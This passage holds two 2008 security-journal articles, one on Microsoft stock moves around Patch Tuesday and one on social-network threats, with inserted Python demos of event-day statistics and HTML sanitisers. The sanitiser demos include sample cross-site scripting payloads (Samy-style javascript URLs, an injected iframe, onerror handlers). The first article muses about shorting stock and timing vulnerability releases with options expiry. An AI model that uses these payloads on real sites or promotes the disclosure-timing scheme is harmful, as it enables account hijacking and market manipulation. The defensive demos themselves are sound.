With our background in vulnerability research, and given the media emphasis on the credit crisis, it’s natural to look for vulnerabilities in the equities and derivatives markets. At the 2007 Black Hat USA Conference, Matasano Security looked at the Financial Information eXchange (FIX) protocol, which underpins the message passing between investment managers executing trades on behalf of clients and broker-dealers.1 2 Matasano’s related research asks questions such as “What vulnerabilities may be present in the FIX protocol?” This was an interesting look at financial protocols from a security weakness standpoint. However, our article will take a different tack: we are more concerned with the financial and social engineering aspects than with the vulnerability aspect.

Our research begins with the following questions:
• What are the stock price implications of Microsoft’s Patch Tuesday?
• What about the day before Patch Tuesday?
• What about the day after Patch Tuesday (sometimes called Exploit Wednesday)?
• What about Advance Notification Thursday?
• What about zero-day threats?
• Do investors even notice these events?
• Are social engineering events involving vulnerabilities and equities occurring today? Could there be even more such events in the future?

As this is a broad topic of study, let’s begin by analyzing only vulnerabilities in Microsoft products. In the near future, we expect to complete complementary data for other software developers, as well as a comparison of the economics of patch distribution methods (for example, Microsoft’s monthly release versus Oracle’s quarterly release versus other vendors’ as-needed release schedules).

The Hypothesis

Patch Tuesday is the second Tuesday of the month. It’s the one day each month when Microsoft releases primarily security and functional updates for Windows and its other applications. Our hypothesis is that on Patch Tuesday there is downward pressure on the price of Microsoft stock (ticker symbol: MSFT). This pressure is likely due to reactions to news articles about the negative implications of security vulnerabilities in Microsoft software. Similarly, there is probably an uptick the following day, Wednesday, when people realize that Microsoft stock was oversold the prior day.

Are People Making Money from Patch Tuesday?

It would seem so. At the very least, it appears that there is a correlation between Microsoft stock price fluctuations and the Patch Tuesday release cycle. For instance, consider Figure 1 (next page).

The first row, “Full-year average,” is our baseline average of the difference between Microsoft’s stock price at the opening of trading and its price at the close of the day. Included as an alternative baseline is the “Non-event days” average, which excludes events such as Advance Notification and Patch Tuesday. It would appear that when Microsoft issues an “Advance Notification,” on average the price has stronger-than-average downward momentum. Similarly, on an average Patch Tuesday there is stronger-than-average downward momentum. Even more interesting is that on Exploit Wednesday (the day after Patch Tuesday) there is, on average, an uptick or net-positive close. This is probably because institutional investors or market makers feel Microsoft was oversold the day before because of the bad news and that, in reality, Microsoft’s value as an investment was only negligibly affected. Note that this trend has been consistent during the past three years and continues today. Although the open-to-close figure is probably easiest to understand, the trends can be seen in the average open-to-high (price of the day) and average open-to-low as well, although in some cases the effect is less strong.

In Figure 2 we see that generally the average intraday high on an Advance Notification day and on a Patch Tuesday is lower than the average intraday high for the year. We also see that the average intraday high on the day following a Patch Tuesday is generally higher, pointing to stronger upward pressures.

In Figure 3 we discover that the average intraday low on a Patch Tuesday is generally lower than the average intraday low for the full year. However, for an Advance Notification day the results are more mixed. Also relevant is that the average intraday low on the day following a Patch Tuesday is usually higher than the full-year average, pointing to stronger upward pressures.

Microsoft stock price change from the day’s open to close

MSFT CHANGE FROM OPEN TO CLOSE                  2008      2007      2006
Full-year average                             -0.17%     0.06%     0.08%
Non-event days                                -0.20%     0.07%     0.08%
Advance Notification                          -0.43%    -0.12%    -0.08%
Patch Tuesday                                 -0.45%    -0.29%    -0.11%
Every Tuesday                                  0.16%     0.05%    -0.03%
Tuesday, but not Patch Tuesday                 0.37%     0.15%    -0.01%
Day after Patch Tuesday                        0.49%     0.21%     0.27%
Every Wednesday                               -0.18%     0.44%     0.29%
Wednesday, but not day after Patch Tuesday    -0.40%     0.51%     0.26%

Figure 1: Examining the change in Microsoft’s stock price on key days shows a consistent three-year trend.

Microsoft open to intraday high

MSFT CHANGE FROM OPEN TO HIGH                   2008      2007      2006
Full-year average                              1.28%     0.97%     0.88%
Non-event days                                 1.34%     0.95%     0.88%
Advance Notification                           0.93%     1.08%     0.58%
Patch Tuesday                                  0.92%     0.98%     0.67%
Every Tuesday                                  1.35%     1.01%     0.92%
Tuesday, but not Patch Tuesday                 1.50%     1.02%     0.99%
Day after Patch Tuesday                        1.52%     1.30%     0.70%
Every Wednesday                                1.25%     1.24%     0.92%
Wednesday, but not day after Patch Tuesday     1.17%     1.23%     0.95%

Figure 2: In intraday trading, Advance Notification days and Patch Tuesdays deliver consistently lower stock price averages compared with other days of the year.

Microsoft open to intraday low

MSFT CHANGE FROM OPEN TO LOW                    2008      2007      2006
Full-year average                             -1.35%    -0.89%    -0.64%
Non-event days                                -1.39%    -0.90%    -0.64%
Advance Notification                          -1.24%    -1.24%    -0.36%
Patch Tuesday                                 -1.58%    -0.99%    -0.93%
Every Tuesday                                 -1.16%    -0.81%    -0.74%
Tuesday, but not Patch Tuesday                -1.01%    -0.76%    -0.68%
Day after Patch Tuesday                       -0.91%    -0.74%    -0.47%
Every Wednesday                               -1.39%    -0.78%    -0.51%
Wednesday, but not day after Patch Tuesday    -1.56%    -0.79%    -0.54%

Figure 3: Patch Tuesday retains its “low” position when compared with the average intraday low for the year.

A word of caution for the casual day trader or retail investor: these price fluctuations are relatively small and tightly time constrained. Profiting at a retail level from such trades would require risking a large amount of capital. A further word of caution is that the data set depicted is relatively small and, thus, by nature, of relatively low quality; no significance test is applied to the differences shown here. For instance, there are only about 260 trading days per year, of which only 12 fall on a Patch Tuesday. Although the data set and fluctuations are small, this level of correlation is likely to be interesting only to institutional investors and should be modeled appropriately.

Now let’s look at some comparative potential profit spreads in Figure 4.

In Figure 4 it appears that purchasing near the average intraday low on a Patch Tuesday and then selling near the average intraday high on the next day would yield a small profit (until this trade becomes more common, resulting in the dampening of the effect).

The profit spreads shown above focus on actual vulnerability disclosures and rest on the assumption that other people behave in a predictable manner. However, just as rumors of a hostile takeover affect the price of a stock, the rumor of several critical defects putting consumers at risk could do so as well.

Consider that fake vulnerability disclosures and rumors already appear today on mailing lists such as Full Disclosure or in IRC chat rooms. It’s possible that events could be orchestrated via social engineering to manipulate the market and its participants. This scenario would clearly be illegal; but where there is profit, there are often people willing to break laws. Similarly, as we will see later, not all attacks would involve social engineering. Some may even be legal.

Situations such as these, in which short-term market predictability yields profits, are unlikely to exist according to the Efficient Market Hypothesis (EMH) and the Random Walk Hypothesis, and are certainly not likely to persist.3 4 As such, we caution readers, as all financial entities should, and state that “past performance does not necessarily indicate future results.”5

Leveraging Share Volume as an Indicator

Another working theory we had was that the Patch Tuesday cycle had dampened the effect of negative press that would have been seen during the days of unscheduled bulletin releases (prior to mid-October 2003). A cursory glance at the share-volume indicator appears to support this theory. (See Figure 5, next page.)

Potential profit spreads

SPREADS                                                                   2008 low   2008 high   2007 low   2007 high   2006 low   2006 high
Full year (intraday low) to full year (intraday high)                       -1.35%       1.28%     -0.89%       0.97%     -0.64%       0.88%
Patch Tuesday (intraday low) to Patch Tuesday (intraday high)               -1.58%       0.92%     -0.99%       0.98%     -0.93%       0.67%
Patch Tuesday (intraday low) to day after Patch Tuesday (intraday high)     -1.58%       1.52%     -0.99%       1.30%     -0.93%       0.70%

Figure 4: Buying stock on a Patch Tuesday (intraday low) and selling it the next day can apparently offer a legitimate profit, but only when trading in large quantities and with considerable risk.

Microsoft volumes, 2002–03

MSFT VOLUME DIFFERENTIALS (UNSCHEDULED)                    2003          2002
Average volume, full year (shares traded per day)    65,074,644    76,903,678
Average volume, full year (non-event)                64,512,432    76,503,325
Average volume, day of unscheduled bulletin          70,017,743    78,796,255
Average difference in volume                              7.60%         2.46%
Average difference in volume relative to non-events       8.53%         3.00%

Figure 5: Microsoft’s trade volume before its move from unscheduled bulletins to Patch Tuesday.

Patch Tuesday releases

MSFT VOLUME DIFFERENTIALS (SCHEDULED)                                        2008           2007           2006           2005           2004
Average volume, full year                                              84,898,274     62,506,437     67,074,387     66,612,503     66,793,733
Average volume, full year (non-event)                                  86,738,696     64,210,868     68,753,419     67,227,483     67,260,018
Average volume, day of Patch Tuesday                                   75,584,620     57,840,233     63,786,108     65,453,142     65,439,875
Average volume, Tuesday but not Patch Tuesday                          79,818,571     59,305,574     64,967,877     69,691,473     66,471,610
Average MSFT difference in volume (Patch Tuesday to full year)            -10.97%         -7.47%         -4.90%         -1.74%         -2.03%
Average MSFT difference in volume (Patch Tuesday to non-events)           -12.86%         -9.92%         -7.22%         -2.64%         -2.71%
Average ^IXIC volume, full year                                     2,249,267,340  2,089,534,502  1,926,859,522  1,731,835,794  1,769,480,040
Average ^IXIC volume, full year (non-event)                         2,271,900,270  2,094,466,552  1,935,854,692  1,732,949,769  1,768,463,981
Average ^IXIC volume on Patch Tuesday                               2,161,318,000  2,054,922,500  2,009,946,667  1,745,967,500  1,759,816,667
Average ^IXIC volume on Tuesday but not Patch Tuesday               2,249,947,143  2,107,280,909  1,813,831,818  1,658,301,818  1,752,408,182
Average ^IXIC difference in volume (Patch Tuesday to full year)            -3.91%         -1.66%          4.31%          0.82%         -0.55%
Average ^IXIC difference in volume (Patch Tuesday to non-events)           -4.87%         -1.89%          3.83%          0.75%         -0.49%
Difference in MSFT Patch Tuesday vs. MSFT non-Patch Tuesday Tuesday        -5.30%         -2.47%         -1.82%         -6.08%         -1.55%
Difference in ^IXIC Patch Tuesday vs. ^IXIC non-Patch Tuesday Tuesday      -3.94%         -2.48%         10.81%          5.29%          0.42%

Figure 6: Instituting Patch Tuesday has apparently convinced traders that there’s no advantage to be gained solely from Patch Tuesday events.
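Figures 1 through 6 above (and Figure 7 below) all come out of one procedure: label each trading day by its position in the patch cycle, then average a per-day metric (open-to-close, open-to-high, open-to-low, or share volume) within each label and compare labels against the full-year and non-event baselines. The script below is an added example, not the article’s own code or data, that performs that bucketing on a list of daily bars. The eight bars are constructed around May 2008 (Patch Tuesday fell on May 13 that month) and are not real quotes; the bucket rules are my reading of the article’s row labels, with Advance Notification taken as the Thursday five days before Patch Tuesday and “day after” as the calendar Wednesday.

```python
"""Event-day bucketing of daily MSFT bars around the Patch Tuesday cycle (added example)."""
from collections import defaultdict
from datetime import date, timedelta


def second_tuesday(year, month):
    """Patch Tuesday is the second Tuesday of the month."""
    first = date(year, month, 1)
    days_to_tuesday = (1 - first.weekday()) % 7   # weekday(): Monday=0, Tuesday=1
    return first + timedelta(days=days_to_tuesday + 7)


def patch_tuesdays(year):
    return {second_tuesday(year, m) for m in range(1, 13)}


def classify(day, patch_days):
    """Every bucket a trading day belongs to, using the article's row labels.
    Assumptions: Advance Notification = Thursday five days before Patch Tuesday;
    'day after' = the calendar Wednesday (a holiday would need 'next trading day');
    'non-event' excludes only Advance Notification and Patch Tuesday itself."""
    is_patch = day in patch_days
    is_advance = (day + timedelta(days=5)) in patch_days
    is_after = (day - timedelta(days=1)) in patch_days
    buckets = {"full_year"}
    if is_patch:
        buckets.add("patch_tuesday")
    if is_advance:
        buckets.add("advance_notification")
    if is_after:
        buckets.add("day_after_patch_tuesday")
    if not (is_patch or is_advance):
        buckets.add("non_event")
    if day.weekday() == 1:
        buckets.add("every_tuesday")
        if not is_patch:
            buckets.add("tuesday_not_patch")
    if day.weekday() == 2:
        buckets.add("every_wednesday")
        if not is_after:
            buckets.add("wednesday_not_day_after")
    return buckets


def bar_metrics(bar):
    """Open-to-close/high/low moves as fractions of the open, plus volume."""
    _, o, h, l, c, v = bar
    return {"open_to_close": (c - o) / o, "open_to_high": (h - o) / o,
            "open_to_low": (l - o) / o, "volume": float(v)}


def bucket_averages(bars, patch_days):
    """bucket -> metric -> mean over the days that fall in that bucket."""
    sums = defaultdict(lambda: defaultdict(float))
    counts = defaultdict(int)
    for bar in bars:
        m = bar_metrics(bar)
        for bucket in classify(bar[0], patch_days):
            counts[bucket] += 1
            for name, value in m.items():
                sums[bucket][name] += value
    return {b: {n: sums[b][n] / counts[b] for n in sums[b]} for b in sums}


def volume_differential(avgs, bucket, baseline):
    """The 'average difference in volume' rows: bucket volume relative to a baseline."""
    return avgs[bucket]["volume"] / avgs[baseline]["volume"] - 1.0


def spread(avgs, buy_bucket, sell_bucket):
    """Figure 4 style pair: average open-to-low where you buy, open-to-high where you sell."""
    return avgs[buy_bucket]["open_to_low"], avgs[sell_bucket]["open_to_high"]


# Constructed bars (date, open, high, low, close, volume); not real quotes.
SAMPLE_BARS = [
    (date(2008, 5, 7), 30.00, 30.30, 29.70, 30.10, 60_000_000),
    (date(2008, 5, 8), 30.00, 30.20, 29.60, 29.85, 55_000_000),   # Advance Notification
    (date(2008, 5, 9), 29.80, 30.10, 29.50, 29.95, 62_000_000),
    (date(2008, 5, 12), 30.00, 30.40, 29.80, 30.20, 64_000_000),
    (date(2008, 5, 13), 30.00, 30.15, 29.50, 29.85, 50_000_000),  # Patch Tuesday
    (date(2008, 5, 14), 30.00, 30.50, 29.70, 30.20, 58_000_000),  # day after
    (date(2008, 5, 15), 30.20, 30.50, 30.00, 30.30, 61_000_000),
    (date(2008, 5, 20), 30.00, 30.40, 29.80, 30.15, 70_000_000),
]

if __name__ == "__main__":
    avgs = bucket_averages(SAMPLE_BARS, patch_tuesdays(2008))
    for bucket in sorted(avgs):
        row = avgs[bucket]
        print(f"{bucket:26} open->close {row['open_to_close']:+.2%}  "
              f"open->high {row['open_to_high']:+.2%}  open->low {row['open_to_low']:+.2%}  "
              f"volume {row['volume']:,.0f}")
    print("Patch Tuesday volume vs non-event days:",
          f"{volume_differential(avgs, 'patch_tuesday', 'non_event'):+.2%}")
```

To reproduce the article’s tables, load a year of real daily quotes (the article credits Yahoo Finance and Google Finance) into the same tuple shape and run bucket_averages for that year; with only 12 Patch Tuesdays per year, the per-bucket means are what the article reports, not anything with a confidence interval attached.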

In Figure 5 (page 25) we see that on the day of release of an unscheduled bulletin in 2003 and 2002, the average volume of shares traded outpaced the average volume for the year by 7.6 percent and 2.46 percent, respectively. When comparing against only non-event days for the full-year average volume, this figure rises to 8.53 percent and 3 percent, respectively.

This contrasts quite sharply with the volume differentials of the more predictable Patch Tuesday releases, shown in Figure 6 (page 25). We’ve also included a comparison between Microsoft (MSFT) and the NASDAQ Composite Index (^IXIC). This would imply that the change from unscheduled (random walk) to prescheduled (Patch Tuesday) bulletins has lowered traders’ interest in events associated with Patch Tuesday.

Next let’s look at the comparison data for Advance Notification (see Figure 7, below).

Why is the average volume lower on Patch Tuesday and Advance Notification day? Our hypothesis is that the gap between the full-year average volume and the average Patch Tuesday volume can be explained by “significantly large events affecting the full-year average” (from martingale probability theory) that are statistically less likely to occur on a Patch Tuesday because of its infrequency (just 12 times per year).6

Advance notification

MSFT VOLUME DIFFERENTIALS (ADVANCE NOTIFICATION)            2008           2007           2006
Average volume, full year                             84,898,274     62,506,437     67,074,387
Average volume, full year (non-event)                 86,738,696     64,210,868     68,753,419
Average volume, day of Advance Notification           82,848,700     61,532,042     54,484,850
Average difference in volume                              -2.41%         -1.56%        -18.77%
Average difference in volume relative to non-events       -4.48%         -4.17%        -20.75%
Average ^IXIC volume, full year                    2,249,267,340  2,089,534,502  1,926,859,522
Average ^IXIC volume, full year (non-event)        2,271,900,270  2,094,466,552  1,935,854,692
Average ^IXIC volume on Advance Notification       2,221,380,000  2,224,365,833  1,872,442,500

Figure 7: On average, fewer Microsoft shares are traded on Patch Tuesday and Advance Notification days.

Press Releases, Reactions, and Implications

The implications of this are interesting, and we hope this article will spur a fresh round of research on the influence of vulnerabilities and threats on the securities markets.

For instance, consider the Emulex hoax.7 In this case, someone posted a fake press release about the CEO’s departure, which resulted in a 62 percent drop in intraday trading of Emulex stock. The person posting the fake release had taken a large short position in the stock and profited more than US$250,000. This was a clear case of fraud. Similarly, there are periodic cases in the news about insider trading (also clearly illegal).

However, if stock price fluctuations occur due to vulnerability and patch announcements, what would happen if a person built up a short position in a major software company and posted a handful of vulnerabilities with exploits to the Full Disclosure mailing list? Perhaps something like the Month of Browser Bugs, but targeted at one vendor, on one day? If this happened during market hours and on a day less likely to have competing news that could distract investors (say a Tuesday or a Thursday), then the downward pressure on the stock could be significant at a consumer level. It would also clearly be illegal if the vulnerabilities were not real (perhaps libel or fraud). However, if they were real, would it be illegal? Reporting the truth, albeit in a potentially manipulative fashion, may or may not be considered social engineering or even illegal.

Perhaps the legality could be argued either way, but consider the Firestone and Ford tire controversy.8 If you had driven a Ford car at the time, had tire problems, and shorted the stock, would that have been legal? Certainly. If you had shorted the stock, and then told Firestone, Ford, or others, would that have been legal?

As with any attack vector or vulnerability, awareness and disclosure often improve the security posture of those who can resolve the problem. By openly talking about weaknesses, perhaps we can improve and appropriately monitor the system. It is possible people are already using zero-day threats for financial gain, not simply by embedding them within password-stealing Trojans but by taking short or options positions in equities and derivatives.

It’s clear that spammers have figured out ways to profit from securities markets: we have received lots of penny-stock spam.

Conclusion

There is still a great deal of work to do in the area of vulnerability and threat implications for the equities and derivatives markets. We’ve primarily focused on the equities markets. The derivatives markets often move in the same direction but with amplified volatility. Given some confidence level in the direction of a move, it would probably make sense for traders who publish vulnerabilities to time that publication with options expiration dates.

I would like to thank my colleagues Craig Schmugar and Eugene Tsyrklevich for reviewing this paper and data set, as well as for providing feedback.—A.B.

Anthony Bettini is a member of the McAfee Avert Labs senior management team. He specializes in Windows security and vulnerability detection. Bettini has spoken at the National Institute of Standards and Technology’s National Information Systems Security Conference in the Washington, D.C. area on anti-tracing techniques as well as for numerous Global 2000 companies. While at Foundstone, he published new vulnerabilities found in ISS Scanner, PGP, Symantec ESM, and other popular applications. Bettini was the technical editor for Hacking Exposed, 5th edition (McGraw-Hill).

endnotes
1 Goldsmith, Dave, and Jeremy Rauch; Matasano Security. “Hacking Capitalism,” Black Hat USA 2007. August 2, 2007.
2 “Financial Information eXchange,” Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange
3 “Random walk hypothesis,” Wikipedia. May 15, 2008. http://en.wikipedia.org/wiki/Random_walk_hypothesis
4 “Efficient Market Hypothesis,” Wikipedia. May 15, 2008. http://en.wikipedia.org/wiki/Efficient_market_hypothesis
5 “Past performance not indicative of future results,” CBOE. May 22, 2008. http://www.cboe.com/micro/vix/faq.aspx
6 “Martingale (probability theory),” Wikipedia. May 22, 2008. http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29
7 “Emulex Hoax,” Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Emulex_hoax
8 “Firestone and Ford tire controversy,” Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

additional references
• “CBOE’s archive of historic VIX data, using newer algorithm for the pre-September 22, 2003 algorithm switch.” April 20, 2008. http://www.cboe.com/micro/vix/historical.aspx
• Lo, Andrew W. “The Adaptive Markets Hypothesis: Market Efficiency from an Evolutionary Perspective.” Journal of Portfolio Management.
• Financial metrics are primarily courtesy of Yahoo Finance. May 15, 2008. http://finance.yahoo.com
• Additional financial metrics are courtesy of Google Finance. April 20, 2008. http://finance.google.com

The Future of Social Networking Sites

By Craig Schmugar

In recent years social networking sites, MySpace and others, have become household terms. Many people think of social networking on the Internet as a relatively new phenomenon when, in fact, sites such as Classmates.com and SixDegrees.com have been around for more than a decade. Still, the growth explosion has occurred only during the past few years. So what exactly makes a site a “social networking” venue? At the core, social networking sites are those that comprise an online community which allows users to share information, discover new contacts, and reconnect with old ones.

Social networking sites are significant for two main reasons. First, they are the epitome of Web 2.0, in which the network of users is the platform and the community drives the content. The platform grows through user contributions, enabled by applications provided for community use. Second, social networking sites combine elements of communication channels—such as email, message boards, instant messaging, and chat—with media vehicles—such as audio, video, and print. In these communities, like-minded individuals can share information and interests and provide feedback and reviews. Such sites can act as collaborative platforms, allowing entire networks to grow in value as the user base increases. Furthermore, these platforms allow for the most direct and targeted media outlets ever seen; businesses can focus their marketing efforts on those who are truly interested. Social networking sites contain a warehouse of information that can be mined and analyzed to expand user profiles and to build complex diagrams and maps of user-to-user and user-to-interest relationships.

Key to the success of any social networking site is a strong and loyal user base. Friendster.com knows this all too well.

Friendster was the precursor to MySpace and by far the number-one social networking site during its prime. What happened to it? Friendster was a sort of success catastrophe. As the user base grew more massive and the content evolved (including the addition of games), the back end failed to keep up with the growth. Site administrators were forced to restrict high-bandwidth content, but even so performance was unsatisfactory and the user base jumped ship. Furthermore, Friendster attempted to fit the user base into their predetermined model of how the network should be used and by whom.

MySpace provided a more robust platform, not only because of its greater bandwidth, but also in the level of freedom users enjoyed to create, modify, and view a wider variety of content. Once the word got out that MySpace was the new Friendster, it didn’t take long for a majority of users to make the switch. A few takeaways from this early battle in social networking are that the platform needs to be flexible, it needs to expand and evolve, and user retention is key. These principles are paving the way for the future of social networking sites.

Social Insecurity

MySpace was able to overtake Friendster in part by allowing users to highly customize their profiles. But this opened the door for attackers to insert malicious code as well as launch convincing phishing attacks directly from their MySpace profiles.

Unfortunately such user flexibility lends itself to exploitable conditions, which the bad guys use and abuse. In a race for market share and in an effort to avoid being the next Friendster, security has taken a back seat for many social networking sites. Consequently, social networking sites have been hosts to worms, phishing attacks, vulnerabilities, data harvesting and leakage, rogue ad distribution, defamation, and last, but not least, spam.
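How “highly customizable profiles” turn into attacker code on other users’ pages comes down to one design choice: whether the site filters user markup for known-bad strings or treats it as data and escapes it. The following is an added example, not code from the article or from MySpace, with a constructed 2005-style blocklist filter next to an escape-then-allowlist renderer. The evasion input is the documented one from the Samy worm, which split the word javascript with a newline inside a CSS url() so a substring filter missed it while Internet Explorer of the day still executed it; the oracle function is mine and just checks whether any markup outside the allowlist survives into the rendered page.

```python
"""Blocklist filtering versus escaping for user-supplied profile markup (added example)."""
import html
import re

SCRIPT_TAG = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)


def blocklist_filter(user_html):
    """2005-style sanitiser: drop <script> blocks and the literal word
    'javascript', then trust whatever is left (constructed for the demo)."""
    cleaned = SCRIPT_TAG.sub("", user_html)
    return cleaned.replace("javascript", "")


ALLOWED_TAGS = ("b", "i", "u", "p", "br")


def allowlist_render(user_text):
    """Treat the profile as data: escape everything, then re-enable a few bare
    tags. No attributes survive, so no style= or on*= handler can ride along."""
    out = html.escape(user_text, quote=True)
    for tag in ALLOWED_TAGS:
        out = out.replace(f"&lt;{tag}&gt;",  f"<{tag}>")
        out = out.replace(f"&lt;/{tag}&gt;", f"</{tag}>")
    return out


UNLISTED_TAG = re.compile(r"<(?!/?(?:b|i|u|p|br)>)")


def contains_unlisted_markup(rendered):
    """Oracle for the demo: any '<' that does not open an allowed bare tag means
    the browser will parse attacker-controlled markup. Whitespace is collapsed
    first because that is exactly what the java\\nscript trick relied on."""
    compact = re.sub(r"\s+", "", rendered.lower())
    return UNLISTED_TAG.search(compact) is not None


# Constructed inputs: the Samy-style evasion and an ordinary profile with a script tag.
SAMY_STYLE_PAYLOAD = (
    "<div style=\"background:url('java\nscript:alert(document.cookie)')\">"
    "profile text</div>"
)
ORDINARY_PROFILE = "<b>Likes:</b> music & <i>live shows</i><script>alert(1)</script>"

if __name__ == "__main__":
    for label, payload in (("samy", SAMY_STYLE_PAYLOAD), ("plain", ORDINARY_PROFILE)):
        print(f"{label:5} blocklist -> unlisted markup survives:",
              contains_unlisted_markup(blocklist_filter(payload)))
        print(f"{label:5} allowlist -> unlisted markup survives:",
              contains_unlisted_markup(allowlist_render(payload)))
```

The blocklist looks fine on the ordinary profile and passes the Samy payload untouched; the allowlist renderer keeps the bold and italic the user wanted and nothing else, which is the property a profile editor actually needs.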

28 McAFEE SECURITY JOURNAL Where Are We Now?

Samy, the first widespread social networking worm, hit MySpace on October 4, 2005. Two and a half years later, most old security vulnerabilities had been patched. But the problem has not gone away. Until security flaws result in fewer subscribers, vulnerabilities will be common, and cross-site scripting vulnerabilities, such as the one exploited by Samy, are one of the most widely reported types of vulnerabilities in the Common Vulnerabilities and Exposures database.1 And the situation is likely to get worse before it gets better.

In May 2007, Facebook launched the Facebook platform, which allowed third-party developers to author and market applications to Facebook's 20 million active users. One year and 50 million additional users later, more than 20,000 Facebook applications have been developed, with 95 percent of the user base having run at least one application.2 These applications pose additional risks, as users may have a false sense of security because of the applications' association with a site they trust, Facebook.com. Yet the vast majority of these applications are released by developers without prior review by the site.

In January 2008, Facebook banned the application Secret Crush after it was reported to have led users to install Zango adware.3 (See Figure 1 for other examples of widespread threats.) The significance is that Facebook doesn't review applications, and things can (and have) "slipped" by. Although this reported case was more of an annoyance (adware), the next could be much worse.

Approximately nine months after Facebook launched its platform, MySpace followed suit, and recently Google released an application program interface (API) for orkut, Google's social networking site. Although these platforms have set the stage for the next generation of social networking sites, they have also created another vector for attackers to exploit.

What Lies Ahead?

Future social networking sites will become more important because platforms will expand further. "Killer apps" will include mobility, presence, and location awareness, with the goal of making your physical life more convenient through your virtual network; you'll have a traveling social network in your back pocket. Not only will you be able to know which of the friends in your network is online, but you'll also be able to know which are nearby. Cell tower triangulation and global positioning systems will be able to pass along your location to whomever you allow. Location-aware services could match local businesses and entertainment to your interests based on your profile. Business travelers could more easily rendezvous with coworkers and clients at conferences and trade shows. The thrill of online dating could be heightened through the creation of location-specific communities, so you wouldn't only meet someone online, but you could also chat with a prospective mate in the same room.

Social sites will also be smarter, mining user information across the web. Social bookmarking site functionality such as Digg will be married with social networks and enhanced with self-learning technology such as Pandora or StumbleUpon and tagging functionality such as Flickr. The result is a more constant and refined stream of relevant information, which actually educates and informs the community in a much more efficient manner than occurs today.

From your iPhone, you'll be able to get movie recommendations from those in your network. You'll also be able to read reviews that your friends found helpful and find show times for the theaters in your vicinity, and then you'll be able to check the location of your friends to determine how quickly they can meet you.

Profiled social networking threats

THREAT                        TYPE               SITE
Grey Goo                      worm               Second Life
JS/QSpace                     worm               MySpace
JS/SpaceFlash                 worm               MySpace
JS/SpaceTalk                  info stealer       MySpace
Kut Wormer                    worm               orkut
Mass leak of private photos   data loss          MySpace
PWS-Banker!1d23               password stealer   orkut
Samy                          worm               MySpace
Scrapkut                      worm               orkut
Secret Crush                  unwanted program   Facebook
Xanga Worm                    worm               Xanga

Figure 1: Worms and other threats have plagued social networking sites. Users often trust their community sites too much.
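The Samy worm and the MySpace profile-customization problem discussed above come down to one engineering choice: whether user-supplied profile markup is filtered by a blacklist of known-bad strings or reduced to an allowlist of known-good tags and attributes. The sanitizer below is an added example written for this edit; it is not code from the article, from MySpace, or from McAfee, and the tag and attribute allowlist and the sample profile snippets are constructed for the demonstration. It keeps only listed tags and attributes, drops script and style content entirely, rejects href and src values whose scheme is not http or https (after stripping the whitespace and control characters that a literal-string blacklist misses), and escapes everything else.

```python
"""Allowlist HTML sanitizer for user-customizable profile pages.

Added example for this edit, not code from the article or from any social
networking site. The allowlist below is an assumption chosen for the demo.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags and attributes a profile may use. Anything else is dropped, which is
# what makes this an allowlist: event handlers (onload, onerror), style
# attributes and unknown tags never reach the output at all.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "a", "img", "div", "span"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "div": {"class"}, "span": {"class"}}
ALLOWED_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Accept only http(s) URLs or same-origin absolute paths.

    Whitespace and control characters are removed before the scheme check
    because browsers ignore them: "java\\nscript:" runs as javascript:, which
    is exactly the variant a blacklist of the literal string misses.
    """
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    try:
        scheme = urlparse(cleaned).scheme.lower()
    except ValueError:
        return False
    if scheme:
        return scheme in ALLOWED_SCHEMES
    return cleaned.startswith("/") and not cleaned.startswith("//")


class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>; their text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # drop the tag itself; its inner text still passes through handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # this is where onload=, onerror=, style= disappear
            value = value or ""
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(html.escape(data, quote=False))  # re-escape decoded text

    # Comments, processing instructions and declarations are dropped by the
    # HTMLParser defaults, which is the behaviour we want here.


def sanitize_profile(user_html):
    """Return the allowlisted version of a user-supplied profile fragment."""
    parser = ProfileSanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed profile snippets in the style of the attacks the article describes.
    samples = [
        '<div style="background:url(javascript:alert(1))" onload="steal()">about me</div>',
        '<a href="java\nscript:alert(document.cookie)">my friends</a>',
        '<script>document.body.innerHTML += "<iframe src=//evil>"</script>hello',
        '<img src="http://example.com/me.png" onerror="addFriend()"> &lt;3',
    ]
    for sample in samples:
        print(repr(sample), "->", repr(sanitize_profile(sample)))
```

The sanitizer is deliberately small: it does not balance unclosed tags and it ignores CSS, so a production deployment would use a maintained HTML sanitizer. The point is the shape of the allowlist, in which anything not explicitly permitted is dropped rather than searched for, so a new obfuscation of "javascript:" or a newly discovered event attribute needs no filter update to be blocked.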

Sites will understand your interests based on your behavior: web sites you visit, articles you read, music you listen to, friends you chat with and what their interests are, for example. This information will be used to keep you current on changing events and to filter the noise that bombards users today. You'll be left with a highly customized web experience that requires very little direct user input. Whereas Web 1.0 was driven by site administrators and Web 2.0 was driven by user-generated content, the future of social networking lies in user and content relationships augmented by user behavior to tailor content.

